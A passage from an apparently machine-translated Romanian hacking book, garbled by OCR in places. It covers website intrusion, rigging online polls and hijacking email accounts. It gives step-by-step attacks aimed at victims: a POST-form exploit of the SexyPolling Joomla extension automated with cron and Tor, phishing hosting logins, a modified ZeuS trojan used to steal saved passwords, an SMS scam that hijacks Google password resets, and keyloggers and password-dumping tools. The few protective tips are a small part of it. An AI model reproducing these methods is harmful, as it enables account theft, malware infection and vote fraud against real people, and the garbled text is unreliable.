serviciu includ software convenabil pentru Windows, Linux, MacOS și, desigur, Android Sunt acceptate doar protocoalele PPTP și OpenVPN Defecte: • Puține puncte de prezență • Reclamații cu privire la suportul tehnic din partea utilizatorilor (multe recenzii negative de la utilizatori de pe Internet) • Fără suport pentru protocoalele L TP și IPsec Compania stochează o mulțime de informații despre utilizator, care pot fi transferate către terți în conformitate cu legislația SUA Pe de altă parte, pe o altă pagină ei afirmă că nu păstrează jurnalele de conexiune Dar, deoarece acesta este un furnizor american, trebuie să funcționeze în conformitate cu legislația locală, deci jurnalele trebuie să fie în continuare În acest capitol, am descoperit cum să vă schimbați adresa IP, cum să accesați o resursă blocată, cum să criptăm datele transmise prin Internet Vă rugăm să rețineți: simplul fapt de a utiliza un VPN sau un proxy anonim nu înseamnă că sunteți anonim Despre anonimatul pe internet vom vorbi în capitolul capitolul Cum să piratezi un site A doua problemă cea mai populară este piratarea site-ului În acest capitol, ne vom uita la de ce și cum să piratam un site web și vom oferi un exemplu din viața reală De ce site-ul este piratat Există următoarele motive pentru piratarea site-ului: Curaj - unele site-uri sunt sparte chiar așa, fără niciun scop Hacking de dragul hackingului De obicei, hackerii începători "lucrează" așa, pentru care faptul că hack-ul în sine este mai presus de orice altceva Scopul final al unui hack este hack-ul în sine De regulă, site-ul este "deformat" - pagina principală se schimbă, al cărei conținut țipă că site-ul a fost spart Profesioniștii nu funcționează așa - nu fac așa ceva, iar site-ul este piratat în așa fel încât nimeni să nu observe că site-ul a fost piratat cât mai mult timp posibil Obținerea accesului la informații confidențiale - hackerii pot pătrunde într-un site pentru a obține acces la informații confidențiale, cum ar fi o bază de utilizatori De exemplu, concurenții pot "ordona" unui hacker să pirateze un site pentru a obține acces la o bază de clienți pentru a atrage clienții existenți Spam - Site-ul poate fi spart pentru a trimite spam Hackerii au piratat spălați un site decent care nu a fost văzut niciodată trimițând spam și nu este inclus pe lista neagră de filtrele de spam După aceea, încep să trimită prin poștă în numele acestui site Parazitare SEO - atunci când un link este plasat de la o resursă la alta ca, site-ul își împarte "greutatea" cu cei la care se referă Acesta este principiul de bază al construirii de legături Un site piratat poate fi folosit în scopuri SEO: paginile portalului proprietarului conțin link-uri către resurse terțe pe care proprietarul nu le-a găzduit Site-urile cu indicatori TIC și PR non-zero sunt supuse atacului, deoarece au ceva de împărtășit Drept urmare, din cauza site-ului piratat, pozițiile în rezultatele căutării site-urilor la care se referă sunt îmbunătățite Alte obiective - fiecare hack are propriul său scop, iar această listă include departe de toate țintele posibile Cum sunt piratate site-urile web Există mai multe moduri de a pirata site-uri: Hacking credentials - puteți ridica, intercepta sau captura în alt mod acreditările (login și parolă) fie în panoul de control al site-ului, fie în serverul FTP/SSH Căutați o vulnerabilitate în codul site-ului Dacă site-ul este construit pe baza unui popular Un CMS open source (WordPress, Joomla!, etc ), șansele ca acesta să fie piratat sunt destul de mari, mai ales dacă versiunea motorului site-ului nu este cea mai recentă Hacking printr-o extensie Aici sunt folosite elemente ale programului dezvoltare împreună cu ingineria socială Hackerul oferă proprietarului sau webmasterului site-ului un fel de extensie, webmasterul o instalează, iar extensia conține o ușă din spate - un cod de program care deschide ușa către site pentru hacker Tehnica calului troian Să luăm în considerare aceste metode mai detaliat În primul caz, hackerul trebuie să obțină cumva acreditările de conectare pe site Interceptarea acestor acreditări a devenit foarte dificilă în ultima vreme, deoarece aproape toate site-urile au trecut la HTTPS, astfel încât toată comunicarea cu acestea, inclusiv transferul numelui de utilizator și al parolei, are loc în formă criptată Este posibil să piratați traficul HTTPS, dar poate dura mult timp În mod similar, acreditările de forță brută vor dura, de asemenea, foarte mult timp Hackerea unui site folosind forța brută este mult mai dificilă decât aceeași rețea WiFi Prin urmare, hackerul va folosi alte metode, de exemplu, I ,i ii' u Ca în i yoma san i inginerie socială - vă puteți suna și vă prezentați ca angajat de suport pentru găzduire sau trimiteți un e-mail cu un link - se spune că locul se epuizează / banii se epuizează - introduceți contul personal pentru a rezolva problema Linkul va duce la un site al cărui nume și aspectul paginii de autentificare vor semăna cu contul personal al utilizatorului de găzduire (nu este o problemă să ne dăm seama ce găzduire are site-ul) Utilizatorul este șocat - cumva - pentru că a plătit recent pentru găzduire Urmează linkul, vede fereastra de introducere a login și parole, le introduce și gata putem presupune că a dat acces hackerului Phishing-ul și ingineria socială sunt adesea cele mai rapide modalități de a pirata un site, mai ales dacă abilitățile hackerului îl împiedică să folosească alte metode Hackingul vulnerabilităților este, de asemenea, o metodă foarte populară de hacking a site-urilor web Pe primul loc în ceea ce privește vulnerabilitățile se află așa-numitele injecții SQL - atunci când operatorii SQL sunt transmise pe site printr-un anumit formular (de exemplu, un formular de contact) sau un parametru GET, care fie returnează informațiile necesare hackerului, fie , invers, modificați informațiile din baza de date De exemplu, folosind injectarea SQL, puteți modifica parola de administrator în baza de date, apoi vă puteți conecta prin panoul de control ca administrator și apoi faceți ce doriți cu site-ul Cu anumite abilități ale unui hacker, această metodă de obținere a unei parole este mult mai rapidă decât piratarea prin forța brută În Capitolul , când ne uităm la Kaii Linux, ne vom uita la unele dintre instrumente, iar mai multe instrumente pentru găsirea vulnerabilităților vor fi acoperite în Capitolul când ne uităm la cadrul popular de găsire a vulnerabilităților, Metasploit În cele din urmă, hacking-ul cu extensie are și dreptul la viață Dar aici politica hackerului nu vizează un anumit site, ci hack-ul de dragul hacking-ului sau al creării unei rețele de site-uri piratate Ideea este următoarea Hackerul găsește o extensie populară și plătită pentru un CMS popular Unele extensii pot fi costisitoare - de la sute la mii de dolari (pentru CMS Magento - acestea sunt prețuri destul de normale) Hackerul cumpără o astfel de extensie Apoi îi taie suportul licenței, ca și cum ar fi anulat-o Se pare că extensia își îndeplinește funcțiile, dar funcționează fără licență, ceea ce vă permite să o instalați pe diferite site-uri, chiar dacă nu ați cumpărat o licență pentru aceste site-uri După aceea, hackerul introduce o ușă din spate în codul de extensie - o funcționalitate care îi va permite hackerului să efectueze de la distanță diverse manipulări Care - depinde de ce are nevoie hackerul Puteți crea o ușă universală care ar permite accesul și parola administratorului hackerului trimite e-mailuri prin site (utilizat pentru spam), ar conține un shell care îți permite să executi comenzi pe site sau un client sql minimal care îți permite să executi instrucțiuni sql Totul depinde de imaginația hackerului În secțiunea următoare, ne vom uita la un exemplu real de hacking și hacking votul pe site Exemplu real: piratarea unui sondaj Înainte de a continua să citiți acest capitol și să încercați în practică ceea ce este scris mai jos, amintiți-vă art - din Codul penal al Federației Ruse Și acum poți citi mai departe! Probabil că toată lumea are prieteni care participă la un fel de competiții (sau au copii care participă la tot felul de evenimente) Și apoi, la un moment bun, se întorc la tine cu o cerere de a "închide" tejgheaua Nu vom înțelege dacă acest lucru este bun sau nu din punct de vedere moral (pe de o parte, este rău, pe de altă parte, aceștia sunt prieteni), dar ne vom da seama cum să o facem Alegerea modului cel mai bun Metoda Prietenii prietenilor O modalitate relativ corectă (mai ales dacă aveți mulți prieteni pe rețelele de socializare) este să trimiteți un mesaj tuturor (de exemplu, prin crearea unei intrări pe pagina rețelei de socializare) prin care vă cere să votați și un link către pagina de vot Puteți face o listă de corespondență prin e-mail, viber, o puteți trimite pe canalul dvs Telegram etc Metoda își poate aduce rezultatele și în același timp nu trebuie să faci nimic De exemplu, unul dintre prietenii mei are peste de contacte Skype Dacă votează cel puțin %, vor fi de voturi, și absolut "legale" - într-adevăr, o persoană a intrat și a votat Nu există protecție împotriva acestei metode, pentru că, de fapt, totul este absolut normal Persoana votează voluntar și nimeni nu-l obligă La urma urmei, cererea poate fi acceptată, dar poate fi și ignorată Metoda Servicii de cheat A doua modalitate este de a folosi serviciile de cheat Dezavantajul acestei metode este că trebuie să plătiți pentru fiecare vot Desigur, totul depinde de fondul de premiere - dacă jocul merită lumânarea, de ce nu? Nu voi recomanda un anumit serviciu de cheat, pentru a nu face reclamă nimănui Cum să te aperi depinde de ce tactici va folosi serviciul de înșelăciune De regulă, fie se folosește înșelăciune cu ajutorul anonimatorilor, fie specialiștii de servicii caută vulnerabilități la vot Administratorul votării poate fi sfătuit să analizeze jurnalele serverului pentru activități suspecte - unul sau mai mulți participanți au început să câștige rapid voturi Nu numai prin backend-ul de vot puteți vedea cine a votat, ci și prin jurnalele instrumentului - trebuie să filtrați jurnalul de acces (de regulă, se numește access log) după numele scriptului care înregistrează voturile De exemplu, dacă scriptul se numește poll php și îi sunt trecuți doi parametri - id (numărul votului) și pid (numărul participantului), atunci comanda va arăta astfel: cat access log | grep poli php?id=l&pid= Totul depinde de implementarea scriptului sondajului în sine Dacă acceptă date utilizând metoda GET, atunci această metodă vă va ajuta să aflați de la ce IP-uri a avut loc un vot pentru un anumit candidat și cât de des s-a întâmplat Dacă scriptul este accesat prin POST, trebuie să-l învățați să înregistreze cererile POST libapache -modsecurity vă va ajuta în acest sens, puteți găsi informații suplimentare pe Internet Metoda Trișează folosind anonimizatori Metoda numărul implică înșelăciune folosind anonimizatoare, proxy, Tor și alte mijloace pentru a schimba IP-ul Metoda Hacking scriptul de vot După cum probabil ați ghicit, ne vom opri în detaliu asupra ultimelor două metode La urma urmei, dezavantajul primei metode nu este faptul că cineva va vota, adică este imposibil să obții un număr garantat de voturi Defect a doua modalitate - trebuie să plătiți bani reali, de care este întotdeauna păcat să vă despărțiți Dar ultimele două metode vă permit să închideți contorul și să obțineți rezultatul în orice caz, și chiar gratuit Administratorii nu trebuie să fie supărați: există un leac Trișează folosind aplicații de anonimizare Anonymizer este un site care vă permite să intrați pe site sub o altă adresă IP Totul este destul de simplu: intri pe site-ul anonimatorului, introduci adresa paginii de vot, mergi la ea (te consideră deja un utilizator nou, deoarece adresa IP a fost schimbată) și votezi În continuare, trebuie să schimbați anonimizatorul sau să selectați un alt server din listă, dacă site-ul de anonimizare vă permite să faceți acest lucru Găsirea unui anonimizat este foarte simplă - căutând "anonimizator frec" pe Google Resurse bune: https://hidester fagure/rgohu/ https://hide eu/ro/proxy h ttp://kproxy fagure/ h ttps://whoer net/webproxy https://www hidemyass fagure/ https://www proxysite fagure/ Toate vă permit să selectați servere diferite, astfel încât să puteți adăuga mai multe voci cu un singur site Dacă anonimizatorul vă permite să setați parametrii de conexiune, asigurați-vă că debifați caseta de selectare Eliminare scripturi - scripturile (cum ar fi JavaScript) sunt adesea folosite de secțiile de votare și ștergerea lor nu va funcționa Acesta este cel mai simplu mod de a vota și este destul de convenabil Dezavantajul este că nu există atât de mulți anonimizatori eu ] Pur și simplu introduceți mai jos URI-ul site-ului pe care doriți să îl accesați httpy/buzzybuzzbiz conectați prin Server aleator Q Opțiuni Mers $ Configurați-vă conectorul Prin apăsarea "Agree & Connect" confirmi că ai citit ana agre ■" Viteza proxyO Proxy Tour (r) HTTP HTTPS AnooymtryO Hțh Medul m Numărul portului V Șosete w Șosete Mo Oo nu știu *cum să folosești " proxy? Reveniți la instrucțiunile pentru brcwse r: v(r)o(r)e "Rijge" Port Country Gty Speed iure Dlolugmu uetdwx* | slOOm HTTP Hijh £ O?jK:i - Russun Fedeution | SlObms HTT₽ | sioerrs http Eu Smt HTTP o rrs HTT "NCI" Pic Lista de proxy anonimi eu ' Desigur, acestea nu sunt singurele liste proxy, dar puteți găsi cu ușurință alte zeci de liste pe Web Prima listă este cea mai convenabilă, deoarece vă permite să filtrați lista după tipul de proxy (avem nevoie de HTTP sau HTTPS în funcție de adresa site-ului de votare), țară, numere de port, anonimat etc După cum arată practica, puteți ignora coloana Viteză - aceasta este viteza de acces a acestui serviciu la proxy Poate fi diferit pentru tine, de exemplu, proxy-ul funcționează bine la o viteză de ms și proxy-ul nu se deschide cu o viteză de lOOms În plus, algoritmul este următorul: Deschideți browserul și introduceți setările proxy (instrucțiuni detaliate au fost date în capitolul ) Te duci pe site și votezi Dacă pagina se încarcă lent sau nu se incarca deloc, incercati urmatoarea adresa din lista Este indicat să votați în modul fereastră privată (incognito în Chrome) pentru ca "votul" să nu lase Cookie-uri Luați următoarea adresă din listă și treceți la pasul ces"general Despre yae • Orez Setarea opțiunilor proxy în Firefox Totul este extrem de simplu Dacă această metodă vi se pare prea complicată, puteți utiliza extensii de browser care vă permit să schimbați adresa IP - cum ar fi FireX Proxy DESPRE W \ out • V Hrrfox despre:preterente*general FireX Proxy ■f- De bază start Foloseste setarile recomandate spărtură Căutare Navigarea pe site Spam Folosiți proc automat| ta" Utilizați derularea lină și Dacă este necesar, și afișați sep Utilizați întotdeauna cursul tastelor Recomandați extensii când pre Setari de retea A* Extensii și teme f suport pentru Firefox Personalizați modul în care Pergeiox se conectează la Internet Mai mult India J K Spania l HTTP "de la" I B I Lista de proxy Orez Extensie FireX Proxy pentru Firefox Nu uitați să vă actualizați lista de proxy în mod regulat "Procesate" primele două pagini ale listei - actualizare, vor apărea noi proxy, poate cu parametri mai buni Defecte: • Dacă cineva este la fel de inteligent ca tine, atunci trebuie să acționezi rapid Cel mai probabil, listele de proxy vor fi și cu concurenți și vor fi ocupate adrese IP • Dezavantajul extensiilor precum FireX Proxy este setul limitat de proxy Pe site-urile care publică liste, alegerea va fi mai bogată Îmi amintesc că odată am "încheiat" un sondaj pe un site web unde puteai vota o dată la de ore În consecință, astăzi am uzurpat o adresă IP, mâine - altcineva O sarcină destul de ingrată, uzurpând mult timp Întrucât omul este o creatură leneșă și inteligentă, este necesar să se caute soluții alternative Cum să te protejezi? Pentru a egaliza șansele, împărtășim webmasterilor cum să se protejeze de anonimizatori Metoda este simplă ca lumea Unele sondaje permit alegeți țara din care puteți vota, puteți stabili și dacă puteți revota de pe același IP În unele cazuri, este permis să se voteze de pe același IP după un anumit timp Înseamnă asta: stabilim că se poate vota doar din Rusia (nu crezi că Kenya, Bangladesh și Zimbabwe vor vota Miss din primul an al universității tale?) Și doar dintr-un IP Desigur, în Rusia există și proxy anonimi, dar sunt mult mai puțini decât în întreaga lume Iar posibilitatea de a vota de pe un IP o singură dată vă va permite să înscrieți un număr mic de voturi, ceea ce nu va afecta în niciun fel rezultatul Dacă ești îngrijorat de această sumă mică, atunci procedează astfel: Limitați posibilitatea de a vota doar din Rusia Căutați pe Internet liste de proxy actualizate în mod constant, selectați numai adrese rusești (de regulă, este indicată țara proxy-ului) și adăugați-le la htaccess în deny from construct) Repeți punctul în fiecare zi - dintr-o dată apare o nouă adresă holo- votul nu durează pentru totdeauna, de regulă, există anumite perioade de vot Mai devreme sau mai târziu veți avea o listă bună de proxy ruși, care vor trebui actualizate, să zicem, o dată pe lună Este mai dificil dacă scriptul nu acceptă restricția de țară Apoi, trebuie să implementați o astfel de verificare pe cont propriu Puteți organiza o verificare a țării, orașului, regiunii după adresa IP folosind diverse servicii Iată cum să obțineți orașul folosind geoplugin net: funcția get geo city($ip) { $ip data = json decode(file get contents("http://www geoplugin net/j son gp?ip='z $ip))" ; if($ip data && $ip data->geoplugin city != null) { $rezultat = $ip date->geoplugin city; } returnează $rezultat; } Și iată o funcție gata făcută pentru obținerea regiunii: funcția get geo region($ip) { $ip data = @ j son decode(file get contents("http://www geoplugin net/j son gp?ip=" $ip)); if($ip data && $ip data->geoplugin region != null) { $rezultat = $ip data->geoplugin regionName; } returnează $rezultat; } Cu ajutorul SxGeo, puteți organiza o verificare astfel: // Include clasa SxGeo php include("SxGeo php"); // Creați un obiect $SxGeo = new SxGeo('SxGeoCity dat'); $ip = $ SERVER['REMOTE ADDR']; var export($SxGeo->getCityFul ($ip)); // Toate informațiile despre oraș var export($SxGeo->get($ip)); // Informatie scurta despre oraș sau codul țării (dacă se utilizează baza de date SxGeo Country) Avantajul primei metode (geoplugin) este că nu trebuie să actualizați periodic baza de date cu adrese IP Dar există un dezavantaj - numele orașelor revine în engleză Dacă pentru uz intern, atunci o opțiune bună Dacă trebuie să organizați afișarea numelui orașului în chirilic, atunci a doua opțiune Dezavantajul este că trebuie să actualizați periodic baza de date de adrese Acum pornim logica Dacă avem un vot local (cum ar fi domnișoara Krasnodar), atunci putem limita în siguranță votul la Teritoriul Krasnodar - acest lucru este destul de logic și veți elimina cele mai multe dintre toate tipurile de proxy Rupem votul Ultima metodă este cea mai dificilă și constă în identificarea a tot felul de "găuri" în sistemul de vot Dezavantaj - sistemul de vot nu poate au puncte slabe (dacă a fost proiectat corect), prin urmare, nu vei reuși Acest articol va descrie un experiment a cărui rețetă a fost găsită pe web Scopul experimentului este de a identifica "găuri" în extensia populară SexyPolling pentru Joomla! (https://extensions joomla org/extension/sexy-polling/) Extensia în sine este destul de nesigură și supusă injecției SQL, nu o recomandăm pentru utilizare Dar în cursul experimentului, au fost identificate "găuri" suplimentare care nu au fost în niciun fel legate de SQL Injection În primul rând, să vedem cum este organizat butonul "Votați" În cazul SexyPolling, a fost așa: Cu LWfool* Orez Ne uităm la codul paginii Din motive evidente, "totul de prisos" este închis După cum puteți vedea, nu există o formă clasică; scriptul JavaScript gestionează clicul pe buton Aparent, el transmite votul tău către server Căutați în scripturi (deși scripturile pot fi definite la sfârșitul paginii) Căutăm un scenariu care să conțină sondaj, poli, vot etc în nume După numele acestui fișier, puteți înțelege cu ce aveți de-a face După ce ați determinat scenariul de vot, puteți căuta pe google informații despre vulnerabilitățile acestuia Pic Determinați scenariul de vot Ne uităm la codul de script pentru a înțelege cum funcționează Vedem că procesarea adreselor IP (o încercare de a afla regiunea etc ) se realizează pe partea clientului, adică în JavaScript: Apoi a devenit clar cărui script este transmisă opțiunea de răspuns selectată de utilizator, precum și parametrii care îi sunt transmise: Orez Parametrii trecuți la script Apoi puteți încerca să îi transmiteți acești parametri manual A fost necesar să se calculeze doar două valori - acesta este ID-ul de vot (parametrul id-ul de poіі-ing) și numărul răspunsului Acest lucru se poate face prin vizualizarea codului paginii Iată codul de vot: Orez Calculați codul de vot Acum găsiți ID-ul răspunsului Fila Elemente din Instrumentele pentru dezvoltatori Chrome ne va ajuta Pic Calculați ID-ul răspunsului Cel mai simplu mod de a trimite o solicitare POST (și judecând după codul JavaScript este că este trimisă o solicitare POST) este un formular HTML obișnuit Iată un formular ca acesta: cinput type=text name="polling id" value=" "> cinput type=text name="sexypolling token" value="l"> cinput type=text name="answer id[]" value=" "> cinput type=submit> c/form> ID-ul de vot, numărul de răspuns și parametrul sexypolling sunt transmise Deschideți fișierul HTML în browser (de preferință prin Tor, pentru a nu vă afișa IP-ul) și apăsați butonul Submit În continuare, ne uităm la tejghea - iată și iată - a crescut! Da, dacă extensia ar fi fost scrisă corect și ar fi verificat adresa IP înainte de a crește contorul, nu s-ar fi întâmplat nimic Dar a fost organizat diferit - mai întâi, JS verifică IP-ul și afișează un contor de timp frumos până la următoarea încercare, dacă persoana a votat deja de pe acest IP, sau "trage" scriptul vote php, care pur și simplu mărește contorul de candidatul dorit Și nu-i pasă câte solicitări ai trimis - cel puțin , cel puțin de la un IP Orez Formularul din browser Automatizăm Apăsarea unui buton este, de asemenea, lucru, astfel încât să puteți automatiza acest proces: Acesta este un script PHP simplu care trimite o solicitare POST către scriptul vote php Cred că scenariul este clar fără niciun comentariu Dacă aveți întrebări, vă rugăm să consultați documentația PHP Apoi, trebuie să vă asigurați că acest script rulează automat Dacă sunteți un utilizator mulțumit de Xelent VDS sau dacă aveți Linux instalat pe computerul dvs de acasă, cel mai corect mod este să adăugați un apel de script PHP (eu îl numesc test php) la program: crontab -e În acest exemplu, scriptul rulează la fiecare minute Adică la fiecare minute candidatul tău va primi un vot Dacă doriți, puteți rula acest script în fiecare minut sau chiar puteți organiza un ciclu și adăugați orice număr de voturi simultan Aici, așa cum doriți Dacă aveți o găzduire obișnuită, puteți "încărca" scriptul PHP cheat pe găzduire, puteți instala extensia de reîncărcare a paginii (cum ar fi Reîncărcarea paginii) în browser și o puteți seta să reîncarce pagina cu scriptul la fiecare câteva minute Pentru a-ți ascunde IP-ul, poți folosi Tor Browser Pic programare cron Cum să te protejezi de hacking? Există trei recomandări: Instalați cea mai recentă versiune a sondajului Sunt șanse ca toate "găurile" cunoscute au fost deja petice Google și încercați să găsiți informații despre vulnerabilitatea celor utilizate a componenta Încercați să reparați singuri "găurile" sau apelați la specialiști Mai exact, în cazul SexyPolling - schimbarea la o altă componentă Dacă doriți cu adevărat să-l utilizați, adăugați o verificare a regiunii/țarii la codul vote php În votul propriu-zis, există posibilitatea limitării în funcție de țară, dar restricția nu este o problemă de ocolit, deoarece vote php în sine nu efectuează o astfel de verificare Mai sus a fost arătat cum se organizează o verificare a regiunii/orașului după adresa IP O verificare similară trebuie adăugată la codul vote php: if (get geo city($ip)'=="Moscova") die(); În loc de die(), puteți organiza o redirecționare către o pagină în care puteți spune tot ce credeți despre înșelăciune: if (get geo city($ip)!=="Moscova") header('Locație: nakrutka html'); Scopul experimentului este de a arăta cât de ușor este să înșeli contorul de voturi dacă există vulnerabilități în sistemul de vot și de a descrie modalități de protecție împotriva acțiunilor ilegale Niciun sistem real nu a fost afectat și întregul proces a fost efectuat în condiții de laborator - pe mașini locale capitolul Cum să piratați e-mailul Acest capitol va analiza modalități reale de a pirata e-mailurile Cunoscând aceste metode, vei ști ce metode folosesc atacatorii și cum să te protejezi de ele Cal troian O modalitate destul de comună de a obține acces la căsuța poștală a altcuiva este de a trimite e-mailuri cu viruși încorporați Mai exact, virusul nu este încorporat în scrisoarea în sine, ci scrisoarea conține doar un link către virus De obicei, conținutul scrisorii ar trebui să "prindă" utilizatorul cu ceva Ar trebui să fie unul la care utilizatorul nu poate să nu reacţioneze Apoi totul este simplu: utilizatorul urmează linkul și codul rău intenționat este descărcat pe computerul său Exemple de troieni sunt DarkComet RAT, SpyEye, Carberp S-au scris multe despre DarkComet RAT pe Web, Carberp este și un troian binecunoscut Și SpyEye este un troian dezvoltat de Alexander Panin, care a apărut chiar și în rapoartele FBI Prin natura activității noastre, trebuie să investigăm securitatea informațiilor unei întreprinderi Am folosit odată o versiune modificată a troianului ZeuS La momentul creării, modificarea creată nu a fost detectată de niciun antivirus (Fig ), mai mult, avea și o funcție de dezactivare a proceselor, printre care se numără și Dr Web Cu toate acestea, Comodo a fost instalat pe computerul victimei - asta este și mai bine Deci avem un ZeuS modificat, dar cum facem victima să-l ruleze? Dacă îi trimiți doar un link, desigur, ea nu îl va urma Munții promițători de aur într-o scrisoare este, de asemenea, ultimul secol, utilizatorii nu mai răspund la acest lucru https://www fbi gov/news/stories/ /january/spyeye-malware-masmind-pleads-guilty/spyeye- malware-mastermind-se pledează vinovat Slvirustotal SHA e a ra eM b d ccd d fa"ece a " FH" nume: y>lі? О "x" Datedaon Gaia / Alayueie data - - UTC (acum minute) & ProbaNy inofensiv* Ttwe ate slrocg mchcators sugerează ca* acest fișier pe care îl utilizați ■ Anaiysts ac RelatiOn-shtps O OrrfcimsSion suplimentar • Comnienfs AVG AVware Anunțul (c) AdoіyіP " AhnLab V ■în Aii baba o Antry-AVt ei Arestat ei ei Pic Raport VirusTotal Când troianul a fost creat, ultimul lucru rămas este să scrieți o scrisoare victimei în care trebuie să o motivați să ruleze troianul Aici trebuie să dai dovadă de ingeniozitate Nu pot exista recomandări specifice, totul depinde de "victimă" De exemplu, puteți trimite o actualizare a unui program de contabilitate unui contabil, desigur, știți ce program este utilizat și dacă au fost comandate actualizări ale acestuia În caz contrar (dacă actualizările nu sunt comandate), o astfel de scrisoare (chiar și în numele presupușilor dezvoltatori ai programului) va trezi suspiciuni Pentru ca câmpul Din să conțină un nume impresionant, și nu hackeg @gmail com, anteturile de e-mail au fost falsificate Acest lucru se face destul de simplu, dar cum exact va fi arătat în metoda Deocamdată, nu ne vom lăsa distrași de acest lucru Odată ce troianul este instalat pe computerul victimei, acesta va fi complet sub controlul dumneavoastră (Fig ) Ce putem? De dragul interesului, ne putem uita la lista proceselor computerizate, care, desigur, nu va conține troianul nostru (Fig ) Putem vizualiza sistemul de fișiere (Figura ) GE Pic Controlând computerul victimei cu Zeus Orez Lista proceselor de pe computerul victimei (informațiile confidențiale sunt umbrite din motive evidente) Orez Sistem de fișiere pe computerul victimei Desigur, cel mai important lucru pentru care s-au pornit toate acestea a fost lista parolelor salvate în browser (Fig ) Printre aceste parole a fost salvată parola Gmail (vezi Fig ) - scopul a fost atins, am avut acces la căsuța poștală! Orez Și aici sunt parolele Metoda de mai sus este doar una dintre multele similare Există diferiți troieni Unii nu au panoul de control tocmai discutat, ci pur și simplu salvează informațiile care te interesează într-un fișier text și le trimit prin e-mail în căsuța ta poștală Hacking după numărul de telefon Esența acestei metode este următoarea Atacatorul trebuie să cunoască numărul de telefon al victimei, specificat la înregistrarea căsuței poștale Când resetați parola, serviciul de e-mail vă solicită să introduceți ultimele caractere ale numărului de telefon (sau să selectați un număr de telefon dintr-o listă) La acest număr va fi trimis un SMS cu un cod de confirmare pentru resetarea parolei Atacatorul trimite apoi un al doilea SMS prin care solicită codul din SMS-ul anterior Utilizatorul, fără să bănuiască nimic, trimite un cod de la primul SMS Cel mai mare dezavantaj al acestei metode este că primul SMS va veni de la Google, iar al doilea de la un număr necunoscut Succesul acestei metode depinde de ingeniozitatea victimei Secvența acțiunilor este următoarea: • Ar trebui să încercați să vă conectați la contul Google al victimei • Deoarece nu știm parola, Google ne va oferi să o recuperăm • În plus, dacă presupusa victimă avea un telefon Android conectat la cont, atunci Google se va oferi să trimită o alertă pe telefonul mobil Este de remarcat faptul că smartphone-ul nu a scos niciun sunet, ci a afișat pur și simplu o alertă Dacă nu se află în fața ochilor utilizatorului, există șansa ca acesta să nu-l observe Dacă utilizatorul face clic pe Nu, atunci nu disperați - repetați acest proces de mai multe ori - mai târziu veți înțelege de ce • După trimiterea notificării, va apărea o pagină cu instrucțiuni, în partea de jos va apărea un link către pagina clasică de resetare a parolei SMS Trimiteți un SMS victimei • Victima va primi un SMS în câteva secunde De pe alt telefon, trimite ceva de genul acesta: O încercare de a vă conecta la contul dvs Google a fost împiedicată Trimiteți codul de verificare Google pentru a vă debloca contul În plus, totul depinde de ingeniozitatea utilizatorului Pe de o parte, utilizatorul poate acorda atenție unui număr necunoscut Pe de altă parte, pune-te în locul utilizatorului obișnuit În primul rând, el primește o notificare de resetare a parolei, apoi un SMS cu un cod de confirmare și apoi un mesaj care afirmă că a fost detectată o activitate suspectă Desigur, puteți complica puțin lucrurile și puteți crea un număr scurt de la care să fie trimis SMS Obținerea unui număr scurt cu numele serviciului, de exemplu, GSecurity, nu este o problemă Nu va face decât să vă sporească șansele de succes Obținerea accesului la căsuța poștală nu este totul Pentru a împiedica victima să ghicească că i-a fost luată cutia poștală, după resetarea parolei, trebuie să creați o parolă temporară și să o trimiteți prin SMS și, între timp, să redirecționați către căsuța poștală "hacker" În acest fel puteți obține controlul cutiei fără a trezi prea multe suspiciuni Această metodă este destul de veche și este folosită cu succes de diverși "specialiști" Ei chiar au scris despre asta pe blogul oficial Symantec, dacă doriți, îl puteți vedea în acțiune: http://ww^ symantec com/connect/blogs/password-recovery~scam-tricks-users-handing-over-email-account-access După cum se spune, este mai bine să vezi o dată decât să auzi de o sută de ori Acces fizic la computer Dacă avem acces la computerul victimei, atunci putem presupune că e-mailul a fost deja piratat Un hacker poate rula fie un keylogger (keylogger), fie un program pentru "recuperarea" parolelor conturilor de e-mail de pe computer Esența unui keylogger este că înregistrează tot ceea ce utilizatorul introduce de la tastatură într-un fișier special Va trebui doar să mergeți a doua oară la computer pentru a ridica fișierul rezultat (sau a-l primi prin poștă - există astfel de spioni) Avantajele unui keylogger includ faptul că înregistrează totul la rând Prin urmare, pe lângă parole, puteți obține o mulțime de informații interesante despre victima dvs Dar au și o mulțime de neajunsuri Cel mai important este că majoritatea keylogger-ului sunt detectate cu succes de antivirusi, iar dacă pe computerul victimei este instalat un antivirus, nu va funcționa să folosești keylogger-ul La urma urmei, nu este întotdeauna posibil să dezactivați antivirusul Al doilea dezavantaj provine din meritul său O mulțime de informații inutile sunt plasate în fișierul rezultat Nu este suficient să colectezi informații de la tastatură, trebuie totuși să găsești printre toate de prisos ceea ce ai nevoie - parola Al treilea dezavantaj este că, dacă victima folosește un client de e-mail și nu o interfață web, atunci keylogger-ul nu va ajuta deloc Cel mai probabil, parola a fost deja introdusă în clientul de e-mail și reținută, astfel încât victima nu o introduce de fiecare dată când își verifică e-mailul Prin urmare, keylogger-ul va scrie în fișier tot ceea ce introduce utilizatorul, cu excepția a ceea ce aveți nevoie Există un alt dezavantaj - dacă keylogger-ul selectat nu acceptă trimiterea fișierului rezultat prin e-mail, atunci va trebui să mergeți încă o dată la computer Un exemplu de keylogger - SniperSpy - în cazul în care doriți să îl utilizați Programele pentru "recuperarea" parolelor pentru conturile de e-mail vă permit să obțineți imediat toate parolele care vă interesează fără a fi nevoie să citiți megaocteți de text în căutarea parolei de care aveți nevoie Mai mult, asupra lor http://www sniperspy com/ antivirusul nu reactioneaza deloc Un astfel de program este Mail PassView Vă permite să recuperați parolele următoarelor conturi de e-mail: • Outlook Express • Microsoft Outlook (numai conturi POP și SMTP) • Microsoft Outlook / / / / / / (conturi POP , IM AP, HTTP și SMTP) • Windows Mail • IncrediMail • Eudora • Netscape x/ x • Mozilla Thunderbird • Grup e-mail gratuit • Yahoo! Mail - dacă parola este salvată în Yahoo! mesager • Hotmail/MSN mail - dacă parola este salvată în aplicația MSN Messenger • Gmail - dacă parola este salvată în Gmail Notifier, Google Desk-top sau Google Talk Mail PassView nu este singurul program de acest gen Există și alte programe: • Outlook Password Decryptor (http://securityxploded com/outlookpassword-decryptor php) - vă permite să recuperați parolele din Outlook, inclusiv cele mai recente versiuni (Outlook care rulează Windows ); • PstPassword (http://www nirsoft net/utils/pst password html) este un alt program pentru recuperarea parolelor salvate în Outlook; • WebBrowserPassView (http://www nirsoft net/utils/web browser password html) este un program pentru recuperarea parolelor stocate într-un browser Browserele IE, Chrome, Opera, Safari, Firefox sunt acceptate Tot ce este necesar este să știți ce client de e-mail folosește victima Găsiți un program pentru "recuperarea" parolei de la acest client de e-mail - nu http://www nirsoft 